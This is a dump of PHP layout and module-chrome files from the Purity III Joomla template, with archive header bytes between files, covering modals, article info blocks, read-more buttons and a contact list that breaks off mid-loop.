	$modalAttributes['data-backdrop'] = (is_bool($params['backdrop']) ? ($params['backdrop'] ? 'true' : 'false') : $params['backdrop']);
}

if (isset($params['keyboard']))
{
	$modalAttributes['data-keyboard'] = (is_bool($params['keyboard']) ? ($params['keyboard'] ? 'true' : 'false') : 'true');
}

/**
 * These lines below are for disabling scrolling of parent window.
 * $('body').addClass('modal-open');
 * $('body').removeClass('modal-open')
 *
 * Scrolling inside bootstrap modals on small screens (adapt to window viewport and avoid modal off screen).
 *      - max-height    .modal-body     Max-height for the modal body
 *                                      When height of the modal is too high for the window viewport height.
 *      - max-height    .iframe         Max-height for the iframe (Deducting the padding of the modal-body)
 *                                      When URL option is set and height of the iframe is higher than max-height of the modal body.
 *
 * Fix iOS scrolling inside bootstrap modals
 *      - overflow-y    .modal-body     When max-height is set for modal-body
 *
 * Specific hack for Bootstrap 2.3.x
 */
$script[] = "jQuery(document).ready(function($) {";
$script[] = "   $('#" . $selector . "').on('show.bs.modal', function() {";

$script[] = "       $('body').addClass('modal-open');";

if (isset($params['url']))
{
	$iframeHtml = JLayoutHelper::render('joomla.modal.iframe', $displayData);

	// Script for destroying and reloading the iframe
	$script[] = "       var modalBody = $(this).find('.modal-body');";
	$script[] = "       modalBody.find('iframe').remove();";
	$script[] = "       modalBody.prepend('" . trim($iframeHtml) . "');";
}
else
{
	// Set modalTooltip container to modal ID (selector), and placement to top-left if no data attribute (bootstrap-tooltip-extended.js)
	$script[] = "       $('.modalTooltip').each(function(){;";
	$script[] = "           var attr = $(this).attr('data-placement');";
	$script[] = "           if ( attr === undefined || attr === false ) $(this).attr('data-placement', 'auto-dir top-left')";
	$script[] = "       });";
	$script[] = "       $('.modalTooltip').tooltip({'html': true, 'container': '#" . $selector . "'});";
}

// Adapt modal body max-height to window viewport if needed, when the modal has been made visible to the user.
$script[] = "   }).on('shown.bs.modal', function() {";

// Get height of the modal elements.
$script[] = "       var modalHeight = $('div.modal:visible').outerHeight(true),";
$script[] = "           modalHeaderHeight = $('div.modal-header:visible').outerHeight(true),";
$script[] = "           modalBodyHeightOuter = $('div.modal-body:visible').outerHeight(true),";
$script[] = "           modalBodyHeight = $('div.modal-body:visible').height(),";
$script[] = "           modalFooterHeight = $('div.modal-footer:visible').outerHeight(true),";

// Get padding top (jQuery position().top not working on iOS devices and webkit browsers, so use of Javascript instead)
$script[] = "           padding = document.getElementById('" . $selector . "').offsetTop,";

// Calculate max-height of the modal, adapted to window viewport height.
$script[] = "           maxModalHeight = ($(window).height()-(padding*2)),";

// Calculate max-height for modal-body.
$script[] = "           modalBodyPadding = (modalBodyHeightOuter-modalBodyHeight),";
$script[] = "           maxModalBodyHeight = maxModalHeight-(modalHeaderHeight+modalFooterHeight+modalBodyPadding);";

if (isset($params['url']))
{
	// Set max-height for iframe if needed, to adapt to viewport height.
	$script[] = "       var iframeHeight = $('.iframe').height();";
	$script[] = "       if (iframeHeight > maxModalBodyHeight){;";
	$script[] = "           $('.modal-body').css({'max-height': maxModalBodyHeight, 'overflow-y': 'auto'});";
	$script[] = "           $('.iframe').css('max-height', maxModalBodyHeight-modalBodyPadding);";
	$script[] = "       }";
}
else
{
	// Set max-height for modal-body if needed, to adapt to viewport height.
	$script[] = "       if (modalHeight > maxModalHeight){;";
	$script[] = "           $('.modal-body').css({'max-height': maxModalBodyHeight, 'overflow-y': 'auto'});";
	$script[] = "       }";
}

$script[] = "   }).on('hide.bs.modal', function () {";
$script[] = "       $('body').removeClass('modal-open');";
$script[] = "       $('.modal-body').css({'max-height': 'initial', 'overflow-y': 'initial'});";
$script[] = "       $('.modalTooltip').tooltip('destroy');";
$script[] = "   });";
$script[] = "});";

JFactory::getDocument()->addScriptDeclaration(implode("\n", $script));
?>
<div id="<?php echo $selector; ?>" <?php echo ArrayHelper::toString($modalAttributes); ?>>
	<div class="modal-dialog">
		<div class="modal-content">
			<?php
			// Header
			if (!isset($params['closeButton']) || isset($params['title']) || $params['closeButton'])
			{
				echo JLayoutHelper::render('joomla.modal.header', $displayData);
			}

			// Body
			echo JLayoutHelper::render('joomla.modal.body', $displayData);

			// Footer
			if (isset($params['footer']))
			{
				echo JLayoutHelper::render('joomla.modal.footer', $displayData);
			}
			?>
		</div>
	</div>
</div>
PKӜ�\��;f77Hpurity_iii/html/layouts/joomla/content/blog_style_default_item_title.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;
use Joomla\CMS\Factory;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;
use Joomla\Component\Content\Site\Helper\RouteHelper;

// Create a shortcut for params.
$params = $displayData->params;
$canEdit = $displayData->params->get('access-edit');

$currentDate = JFactory::getDate()->format('Y-m-d H:i:s');

if (version_compare(JVERSION, '4', '<')) {
	$isExpired = $displayData->publish_down < $currentDate && $displayData->publish_down !== JFactory::getDbo()->getNullDate();
} else {
	$isExpired = $displayData->publish_down !== null && $displayData->publish_down < $currentDate;
}

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html');
?>

	<?php if ($params->get('show_title') || $displayData->state == 0 || ($params->get('show_author') && !empty($displayData->author ))) : ?>
		<div class="page-header">

			<?php if ($params->get('show_title')) : ?>
				<h2 itemprop="name">
					<?php if ($params->get('link_titles') &&
						($params->get('access-view') || $params->get('show_noauth', '0') == '1')): ?>
						<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($displayData->slug, $displayData->catid, $displayData->language)); ?>" itemprop="url">
						<?php echo $this->escape($displayData->title); ?></a>
					<?php else : ?>
						<?php echo $this->escape($displayData->title); ?>
					<?php endif; ?>
				</h2>
			<?php endif; ?>

			<?php if ($displayData->state == 0) : ?>
				<span class="label label-warning"><?php echo Text::_('JUNPUBLISHED'); ?></span>
			<?php endif; ?>
			<?php if ($displayData->publish_up > $currentDate) : ?>
				<span class="label label-warning"><?php echo Text::_('JNOTPUBLISHEDYET'); ?></span>
			<?php endif; ?>

			<?php if ($isExpired) : ?>
				<span class="label label-warning"><?php echo Text::_('JEXPIRED'); ?></span>
		<?php endif; ?>
		</div>
	<?php endif; ?>
PKӜ�\E�c	c	;purity_iii/html/layouts/joomla/content/info_block/block.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

$blockPosition = $displayData['params']->get('info_block_position', 0);

?>
	<dl class="article-info  muted">

		<?php if ($displayData['position'] == 'above' && ($blockPosition == 0 || $blockPosition == 2)
				|| $displayData['position'] == 'below' && ($blockPosition == 1)
				) : ?>

			<dt class="article-info-term">
				<?php // TODO: implement info_block_show_title param to hide article info title ?>
				<?php if ($displayData['params']->get('info_block_show_title', 1)) : ?>
					<?php echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?>
				<?php endif; ?>
			</dt>

			<?php if ($displayData['params']->get('show_author') && !empty($displayData['item']->author )) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.author', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_parent_category') && !empty($displayData['item']->parent_slug)) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.parent_category', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_category')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.category', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_publish_date')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.publish_date', $displayData); ?>
			<?php endif; ?>
		<?php endif; ?>

		<?php if ($displayData['position'] == 'above' && ($blockPosition == 0)
				|| $displayData['position'] == 'below' && ($blockPosition == 1 || $blockPosition == 2)
				) : ?>
			<?php if ($displayData['params']->get('show_create_date')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.create_date', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_modify_date')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.modify_date', $displayData); ?>
			<?php endif; ?>

			<?php if ($displayData['params']->get('show_hits')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.hits', $displayData); ?>
			<?php endif; ?>
		<?php endif; ?>
	</dl>
PKӜ�\a4l=��>purity_iii/html/layouts/joomla/content/info_block/category.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;
$item = $displayData['item'];
$title = $this->escape($item->category_title);
if (!isset($item->catslug)) {
	$item->catslug = $item->category_alias ? ($item->catid.':'.$item->category_alias) : $item->catid;
}
?>
			<dd class="category-name hasTooltip" title="<?php echo JText::sprintf('COM_CONTENT_CATEGORY', ''); ?>">
				<i class="fa fa-folder-open"></i>
				<?php if ($displayData['params']->get('link_category') && $item->catslug) : ?>
					<?php echo JHtml::_('link', JRoute::_(ContentHelperRoute::getCategoryRoute($item->catslug)), '<span itemprop="genre">'.$title.'</span>'); ?>
				<?php else : ?>
					<span itemprop="genre"><?php echo $title ?></span>
				<?php endif; ?>
			</dd>PKӜ�\ohE���Bpurity_iii/html/layouts/joomla/content/info_block/publish_date.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;
?>
			<dd class="published hasTooltip" title="<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', ''); ?>">
				<i class="icon-calendar"></i>
				<time datetime="<?php echo JHtml::_('date', $displayData['item']->publish_up, 'c'); ?>" itemprop="datePublished">
					<?php echo JHtml::_('date', $displayData['item']->publish_up, JText::_('DATE_FORMAT_LC3')); ?>
				</time>
			</dd>PKӜ�\H1IbbEpurity_iii/html/layouts/joomla/content/info_block/parent_category.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

$item = $displayData['item'];
$params = $displayData['params'];
$title = $this->escape($item->parent_title);
?>
			<dd class="parent-category-name hasTooltip" title="<?php echo JText::sprintf('COM_CONTENT_PARENT', ''); ?>">
				<i class="fa fa-folder"></i>
				<?php if ($params->get('link_parent_category') && !empty($item->parent_slug)) : ?>
					<?php echo JHtml::_('link', JRoute::_(ContentHelperRoute::getCategoryRoute($item->parent_slug)), '<span itemprop="genre">'.$title.'</span>'); ?>
				<?php else : ?>
					<span itemprop="genre"><?php echo $title ?></span>
				<?php endif; ?>
			</dd>PKӜ�\˃�):purity_iii/html/layouts/joomla/content/info_block/hits.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
			<dd class="hits">
					<i class="fa fa-eye"></i>
					<meta itemprop="interactionCount" content="UserPageVisits:<?php echo $displayData['item']->hits; ?>" />
					<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $displayData['item']->hits); ?>
			</dd>PKӜ�\�V�<purity_iii/html/layouts/joomla/content/info_block/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\_pz__Apurity_iii/html/layouts/joomla/content/info_block/modify_date.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
			<dd class="modified">
				<i class="fa fa-clock-o"></i>
				<time datetime="<?php echo JHtml::_('date', $displayData['item']->modified, 'c'); ?>" itemprop="dateModified">
					<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $displayData['item']->modified, JText::_('DATE_FORMAT_LC3'))); ?>
				</time>
			</dd>PKӜ�\Sa%�bbApurity_iii/html/layouts/joomla/content/info_block/create_date.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
			<dd class="create">
					<i class="fa fa-calendar"></i>
					<time datetime="<?php echo JHtml::_('date', $displayData['item']->created, 'c'); ?>" itemprop="dateCreated">
						<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $displayData['item']->created, JText::_('DATE_FORMAT_LC3'))); ?>
					</time>
			</dd>PKӜ�\ݪ.��<purity_iii/html/layouts/joomla/content/info_block/author.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;
$item = $displayData['item'];
$author = ($item->created_by_alias ? $item->created_by_alias : $item->author);
$author = '<span itemprop="name">' . $author . '</span>';
?>

<dd class="createdby hasTooltip" itemprop="author" itemscope itemtype="http://schema.org/Person" title="<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', ''); ?>">
	<i class="fa fa-user"></i>
	<?php if (!empty($displayData['item']->contact_link ) && $displayData['params']->get('link_author') == true) : ?>
		<?php echo JHtml::_('link', $displayData['item']->contact_link, $author, array('itemprop' => 'url')); ?>
	<?php else :?>
		<?php echo $author; ?>
	<?php endif; ?>
</dd>
PKӜ�\$�L�
�
3purity_iii/html/layouts/joomla/content/readmore.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
$params = $displayData['params'];
$item = $displayData['item'];
$direction = Factory::getLanguage()->isRtl() ? 'left' : 'right';

$readmoreText = version_compare(JVERSION, '4', 'ge') ? Text::_('JGLOBAL_READ_MORE') : Text::_('COM_CONTENT_READ_MORE_TITLE');
$readmoreShowTitle = version_compare(JVERSION, '4', 'ge') ? Text::sprintf('JGLOBAL_READ_MORE_TITLE', HTMLHelper::_('string.truncate', $item->title, $params->get('readmore_limit'))) : Text::_('COM_CONTENT_READ_MORE') ." ".HTMLHelper::_('string.truncate', $item->title, $params->get('readmore_limit'));

?>

<section class="readmore">
	<?php if (!$params->get('access-view')) : ?>
		<a class="btn btn-default" href="<?php echo $displayData['link']; ?>" itemprop="url" aria-label="<?php echo Text::_('COM_CONTENT_REGISTER_TO_READ_MORE') . ' ' . $this->escape($item->title); ?>">
			<span>
				<?php echo '<span class="icon-chevron-' . $direction . '" aria-hidden="true"></span>'; ?>
				<?php echo Text::_('COM_CONTENT_REGISTER_TO_READ_MORE'); ?>
			</span>
		</a>
	<?php elseif ($readmore = $item->alternative_readmore) : ?>
		<a class="btn btn-default" href="<?php echo $displayData['link']; ?>" itemprop="url" aria-label="<?php echo htmlspecialchars($item->title, ENT_QUOTES, 'UTF-8'); ?>">
			<span>
				<?php echo '<span class="icon-chevron-' . $direction . '" aria-hidden="true"></span>'; ?> 
				<?php echo $readmore; ?>
				<?php if ($params->get('show_readmore_title', 0) != 0) : ?>
					<?php echo JHtml::_('string.truncate', $item->title, $params->get('readmore_limit')); ?>
				<?php endif; ?>
			</span>
		</a>
	<?php elseif ($params->get('show_readmore_title', 0) == 0) : ?>
		<a class="btn btn-default" href="<?php echo $displayData['link']; ?>" itemprop="url" aria-label="<?php echo Text::sprintf('COM_CONTENT_READ_MORE', $this->escape($item->title)); ?>">
			<span>
				<?php echo '<span class="icon-chevron-' . $direction . '" aria-hidden="true"></span>'; ?>
				<?php echo $readmoreText; ?>

			</span>
		</a>
	<?php else : ?>
		<a class="btn btn-default" href="<?php echo $displayData['link']; ?>" itemprop="url" aria-label="<?php echo Text::sprintf('COM_CONTENT_READ_MORE', $this->escape($item->title)); ?>">
		<span>
			<?php echo '<span class="icon-chevron-' . $direction . '" aria-hidden="true"></span>'; ?> 
			<?php echo $readmoreShowTitle; ?>
		</span>
		</a>
	<?php endif; ?>
</section>
PKӜ�\�V�1purity_iii/html/layouts/joomla/content/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\T3�ww5purity_iii/html/layouts/joomla/content/item_aside.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

$params = $displayData['params'];
$item = $displayData['item'];
$blockPosition = $params->get('info_block_position', 2);
?>

<aside class="article-aside clearfix">
	<dl class="article-info pull-left">
		<dt class="article-info-term">
			<?php echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?>
		</dt>
		<?php if ($params->get('show_parent_category') && !empty($item->parent_slug)) : ?>
			<?php echo JLayoutHelper::render('joomla.content.info_block.parent_category', $displayData); ?>
		<?php endif; ?>

		<?php if ($params->get('show_category')) : ?>
			<?php echo JLayoutHelper::render('joomla.content.info_block.category', $displayData); ?>
		<?php endif; ?>

		<?php if ($params->get('show_author') && !empty($item->author)) : ?>
			<?php echo JLayoutHelper::render('joomla.content.info_block.author', $displayData); ?>
		<?php endif; ?>

		<?php if ($params->get('show_publish_date')) : ?>
			<?php echo JLayoutHelper::render('joomla.content.info_block.publish_date', $displayData); ?>
		<?php endif; ?>

		<?php if ($blockPosition == 0) : ?>
			<?php if ($params->get('show_modify_date')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.modify_date', $displayData); ?>
			<?php endif; ?>
			<?php if ($params->get('show_create_date')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.create_date', $displayData); ?>
			<?php endif; ?>

			<?php if ($params->get('show_hits')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.hits', $displayData); ?>
			<?php endif; ?>
		<?php endif; ?>
	</dl>

	<?php echo JLayoutHelper::render('joomla.content.icons', $displayData); ?>

</aside>PKӜ�\�V�)purity_iii/html/layouts/joomla/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\�QO��purity_iii/html/modules.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

defined('_JEXEC') or die('Restricted access');

/**
 * This is a file to add template specific chrome to module rendering.  To use it you would
 * set the style attribute for the given module(s) include in your template to use the style
 * for each given modChrome function.
 *
 * eg.  To render a module mod_test in the sliders style, you would use the following include:
 * <jdoc:include type="module" name="test" style="slider" />
 *
 * This gives template designers ultimate control over how modules are rendered.
 *
 * NOTICE: All chrome wrapping methods should be named: modChrome_{STYLE} and take the same
 * three arguments.
 */


/*
 * Default Module Chrome that has semantic markup and has best SEO support
 */
function modChrome_T3Xhtml($module, &$params, &$attribs)
{ 
	$badge          = preg_match ('/badge/', $params->get('moduleclass_sfx',''))? '<span class="badge">&nbsp;</span>' : '';
	$moduleTag      = htmlspecialchars($params->get('module_tag', 'div'));
	$headerTag      = htmlspecialchars($params->get('header_tag', 'h3'));
	$headerClass    = $params->get('header_class');
	$bootstrapSize  = $params->get('bootstrap_size');
	$moduleClass    = !empty($bootstrapSize) ? ' col-sm-' . (int) $bootstrapSize . '' : '';
	$moduleClassSfx = htmlspecialchars($params->get('moduleclass_sfx',''));

	if (!empty ($module->content)) {
		$html = "<{$moduleTag} class=\"t3-module module{$moduleClassSfx} {$moduleClass}\" id=\"Mod{$module->id}\">" .
					"<div class=\"module-inner\">" . $badge;

		if ($module->showtitle != 0) {
			$html .= "<{$headerTag} class=\"module-title {$headerClass}\"><span>{$module->title}</span></{$headerTag}>";
		}

		$html .= "<div class=\"module-ct\">{$module->content}</div></div></{$moduleTag}>";

		echo $html;
	}
}


function modChrome_FeatureRow($module, &$params, &$attribs)
{ 
	$badge          = preg_match ('/badge/', $params->get('moduleclass_sfx',''))? '<span class="badge">&nbsp;</span>' : '';
	$moduleTag      = htmlspecialchars($params->get('module_tag', 'div'));
	$headerTag      = htmlspecialchars($params->get('header_tag', 'h3'));
	$headerClass    = $params->get('header_class');
	$bootstrapSize  = $params->get('bootstrap_size');
	$moduleClass    = !empty($bootstrapSize) ? ' col-sm-' . (int) $bootstrapSize . '' : '';
	$moduleClassSfx = htmlspecialchars($params->get('moduleclass_sfx',''));

	if (!empty ($module->content)) {
		$html = "<{$moduleTag} class=\"row-feature {$moduleClassSfx} {$moduleClass}\" id=\"Mod{$module->id}\">" .
					"<div class=\"container\">" . $badge;

		if ($module->showtitle != 0) {
			$html .= "<{$headerTag} class=\"row row-feature-title {$headerClass}\"><span>{$module->title}</span></{$headerTag}>";
		}

		$html .= "<div class=\"row row-feature-ct\">{$module->content}</div></div></{$moduleTag}>";

		echo $html;
	}
}



function modChrome_t3tabs($module, $params, $attribs)
{
	$area = isset($attribs['id']) ? (int) $attribs['id'] :'1';
	$area = 'area-'.$area;

	static $modulecount;
	static $modules;

	if ($modulecount < 1) {
		$modulecount = count(JModuleHelper::getModules($attribs['name']));
		$modules = array();
	}

	if ($modulecount == 1) {
		$temp = new stdClass;
		$temp->content = $module->content;
		$temp->title = $module->title;
		$temp->params = $module->params;
		$temp->id = $module->id;
		$modules[] = $temp;

		// list of moduletitles
		echo '<ul class="nav nav-tabs" id="tab'.$temp->id .'">';

		foreach($modules as $rendermodule) {
			echo '<li><a data-toggle="tab" href="#module-'.$rendermodule->id.'" >'.$rendermodule->title.'</a></li>';
		}
		echo '</ul>';
		echo '<div class="tab-content">';
		$counter = 0;
		// modulecontent
		foreach($modules as $rendermodule) {
			$counter ++;

			echo '<div class="tab-pane  fade in" id="module-'.$rendermodule->id.'">';
			echo $rendermodule->content;
			
			echo '</div>';
		}
		echo '</div>';
		echo '<script type="text/javascript">';
		echo 'jQuery(document).ready(function(){';
			echo 'jQuery("#tab'.$temp->id.' a:first").tab("show")';
			echo '});';
		echo '</script>';
		$modulecount--;

	} else {
		$temp = new stdClass;
		$temp->content = $module->content;
		$temp->params = $module->params;
		$temp->title = $module->title;
		$temp->id = $module->id;
		$modules[] = $temp;
		$modulecount--;
	}
}


function modChrome_t3slider($module, &$params, &$attribs)
{
	$badge = preg_match ('/badge/', $params->get('moduleclass_sfx'))?"<span class=\"badge\">&nbsp;</span>\n":"";
	$headerLevel = isset($attribs['headerLevel']) ? (int) $attribs['headerLevel'] : 3;
	?>

	<div class="moduleslide-<?php echo $module->id ?> collapse-trigger collapsed" data-toggle="collapse" data-target="#slidecontent-<?php echo $module->id ?>">
		<h<?php echo $headerLevel; ?>><span><?php echo $module->title; ?></span></h<?php echo $headerLevel; ?>>
	</div>

	<div id="slidecontent-<?php echo $module->id ?>" class="collapse-<?php echo $module->id ?> in"><?php echo $module->content; ?></div>

	<script type="text/javascript">;
	jQuery(document).ready(function(){;
		jQuery(".collapse-<?php echo $module->id ?>").collapse({toggle: 1});
	});
	</script>

	<?php 
} 


function modChrome_t3modal($module, &$params, &$attribs)
{

	$headerLevel = isset($attribs['headerLevel']) ? (int) $attribs['headerLevel'] : 3;

	if (!empty ($module->content)) : ?>

	<div class="moduletable <?php echo $params->get('moduleclass_sfx'); ?> modalmodule">
		<div class="t3-module-title">
			<a href="#module<?php echo $module->id ?>" role="button" class="btn" data-toggle="modal">
				<h<?php echo $headerLevel; ?>><span><?php echo $module->title; ?></span></h<?php echo $headerLevel; ?>>
			</a>
		</div>
		<div id="module<?php echo $module->id ?>" class="modal hide fade" aria-hidden="true">
			<div class="modal-header">
				<h<?php echo $headerLevel; ?>><span><?php echo $module->title; ?></span></h<?php echo $headerLevel; ?>>
				<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>

			</div>
			<div class="t3-module-body">
				<?php echo $module->content; ?>
			</div>
		</div>
	</div>
	
	<?php endif;  
}


function modChrome_popover($module, &$params, &$attribs)
{
	$position = preg_match ('/left/', $params->get('moduleclass_sfx',''))?"":"";
	$headerLevel = isset($attribs['headerLevel']) ? (int) $attribs['headerLevel'] : 3;

	if (!empty ($module->content)) : ?>
	<div class="moduletable <?php echo $params->get('moduleclass_sfx',''); ?> popovermodule">
		<a id="popover<?php echo $module->id ?>" href="#" rel="popover" data-placement="right" class="btn">
			<h<?php echo $headerLevel; ?>><span><?php echo $module->title; ?></span></h<?php echo $headerLevel; ?>>
		</a>
		<div id="popover_content_wrapper-<?php echo $module->id ?>" style="display: none">
			<div><?php echo $module->content; ?></div>
		</div>
		
		<script type="text/javascript">;
		jQuery(document).ready(function(){

			jQuery("#popover<?php echo $module->id ?>").popover({
				html: true,
				content: function() {
					return jQuery('#popover_content_wrapper-<?php echo $module->id ?>').html();
				}
			}).click(function(e) {
				e.preventDefault();
			});
		});
		</script>
	</div>
	<?php endif;  
}PKӜ�\��TT&purity_iii/html/mod_footer/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_footer
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;
?>
<div class="module">
	<small><?php echo $lineone; ?> Designed by <a href="http://www.joomlart.com/" title="Visit Joomlart.com!" <?php echo method_exists('T3', 'isHome') && T3::isHome() ? '' : 'rel="nofollow"' ?>>JoomlArt.com</a>.</small>
	<small><?php echo JText::_( 'MOD_FOOTER_LINE2' ); ?></small>
</div>PKӜ�\�V�%purity_iii/html/mod_footer/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\�V�&purity_iii/html/com_contact/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\Z�""6purity_iii/html/com_contact/category/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;
use Joomla\CMS\Uri\Uri;

$com_path = JPATH_ROOT . 'components/com_contact';
if(!class_exists('ContactHelperRoute')){
	if(version_compare(JVERSION, '4', 'ge')){
		require_once(JPATH_ROOT . '/components/com_contact/src/Helper/RouteHelper.php');
		class ContactHelperRoute extends \Joomla\Component\Contact\Site\Helper\RouteHelper{};
	}else{
		JLoader::register('ContactHelperRoute', $com_path . '/helpers/route.php');
	}
}

if(version_compare(JVERSION, '4', 'ge')){
	/** @var Joomla\CMS\WebAsset\WebAssetManager $wa */
	$wa = $this->document->getWebAssetManager();
	$wa->useScript('com_contact.contacts-list');

}

JHtml::_('behavior.core');

$listOrder = $this->escape($this->state->get('list.ordering'));
$listDirn  = $this->escape($this->state->get('list.direction'));
?>
<?php if (empty($this->items)) : ?>
	<p> <?php echo JText::_('COM_CONTACT_NO_CONTACTS'); ?>	 </p>
<?php else : ?>

	<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString()); ?>" method="post" name="adminForm" id="adminForm">
	<?php if ($this->params->get('filter_field') || $this->params->get('show_pagination_limit')) : ?>
	<fieldset class="filters btn-toolbar">
		<?php if ($this->params->get('filter_field')) : ?>
			<div class="btn-group">
				<label class="filter-search-lbl element-invisible" for="filter-search"><span class="label label-warning"><?php echo JText::_('JUNPUBLISHED'); ?></span><?php echo JText::_('COM_CONTACT_FILTER_LABEL') . '&#160;'; ?></label>
				<input type="text" name="filter-search" id="filter-search" value="<?php echo $this->escape($this->state->get('list.filter')); ?>" class="inputbox" onchange="document.adminForm.submit();" title="<?php echo JText::_('COM_CONTACT_FILTER_SEARCH_DESC'); ?>" placeholder="<?php echo JText::_('COM_CONTACT_FILTER_SEARCH_DESC'); ?>" />
			</div>
		<?php endif; ?>

		<?php if ($this->params->get('show_pagination_limit')) : ?>
			<div class="btn-group pull-right">
				<label for="limit" class="element-invisible">
					<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>
				</label>
				<?php echo $this->pagination->getLimitBox(); ?>
			</div>
		<?php endif; ?>
	</fieldset>
	<?php endif; ?>

		<ul class="category row-striped">
			<?php foreach ($this->items as $i => $item) : ?>

				<?php if (in_array($item->access, $this->user->getAuthorisedViewLevels())) : ?>
					<?php if ($this->items[$i]->published == 0) : ?>
						<li class="row-fluid system-unpublished cat-list-row<?php echo $i % 2; ?>">
					<?php else : ?>
						<li class="row-fluid cat-list-row<?php echo $i % 2; ?>" >
					<?php endif; ?>

